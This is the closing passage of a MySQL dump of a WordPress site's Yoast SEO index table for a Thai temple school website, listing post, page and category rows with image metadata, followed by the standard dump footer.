(99,'http://watprato.ssk.in.th/?p=384','32:5052761563d05ff8ba421fe489e37692',384,'post','post',1,0,NULL,NULL,'กิจกรรมทัศนศึกษา ปี 2565','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/318903118_5733393766710478_7062341533160628623_n.jpg',NULL,'385','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/318903118_5733393766710478_7062341533160628623_n.jpg','385','featured-image','{\"width\":2048,\"height\":1366,\"filesize\":805139,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/12/318903118_5733393766710478_7062341533160628623_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/12/318903118_5733393766710478_7062341533160628623_n.jpg\",\"size\":\"full\",\"id\":385,\"alt\":\"\",\"pixels\":2797568,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:29:37','2022-12-21 20:22:17',1,NULL,NULL,NULL,NULL,0,1,2,'2022-12-20 07:31:44','2022-12-20 07:31:43',NULL),
(101,'http://watprato.ssk.in.th/?p=387','32:87df3824ad973c8a8403bb10a5b31dbe',387,'post','post',1,0,NULL,NULL,'รับรางวัลการประกวดภาพวาดสิ่งเสริมวัฒนธรรมความสัมพันธ์ไทย &#8211; ญี่ปุ่น','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/316938937_6025615394136116_9066570858547812790_n.jpg',NULL,'388','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/316938937_6025615394136116_9066570858547812790_n.jpg','388','featured-image','{\"width\":1479,\"height\":1109,\"filesize\":396937,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/12/316938937_6025615394136116_9066570858547812790_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/12/316938937_6025615394136116_9066570858547812790_n.jpg\",\"size\":\"full\",\"id\":388,\"alt\":\"\",\"pixels\":1640211,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:33:36','2022-12-21 20:21:57',1,NULL,NULL,NULL,NULL,0,1,2,'2022-12-20 07:33:40','2022-12-20 07:33:39',NULL),
(109,'http://watprato.ssk.in.th/?page_id=505','38:c5d9bfb6989af487baf96a77f19587cc',505,'post','page',1,0,NULL,NULL,'WP Popups Preview','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2024-06-05 03:39:07','2024-06-04 20:39:07',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-05 03:39:06','2024-06-05 03:39:06',0),
(110,'http://watprato.ssk.in.th/?post_type=wppopups-templates','55:1a29572f1b53c1e1abfc89e2c9192584',NULL,'post-type-archive','wppopups-templates',NULL,NULL,'%%pt_plural%% Archive %%page%% %%sep%% %%sitename%%','','Content Templates',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2024-06-05 03:47:39','2024-06-04 20:47:39',1,NULL,NULL,NULL,NULL,0,NULL,2,NULL,NULL,NULL),
(111,'http://watprato.ssk.in.th/?cat=14','33:7bb4f7589f13dde826beaa632d8c1a85',14,'term','category',NULL,NULL,NULL,NULL,'ประชาสัมพันธ์',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,NULL,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/447852358_122152884128202781_5056565582443310750_n.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/447852358_122152884128202781_5056565582443310750_n.jpg',NULL,'first-content-image',NULL,0,NULL,NULL,'2024-06-06 03:14:08','2024-06-05 20:31:51',1,NULL,NULL,NULL,NULL,1,NULL,2,'2024-06-06 10:31:51',NULL,NULL);
/*!40000 ALTER TABLE `wp_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Dumping events for database 'w037'
--

--
-- Dumping routines for database 'w037'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-04-03 20:00:09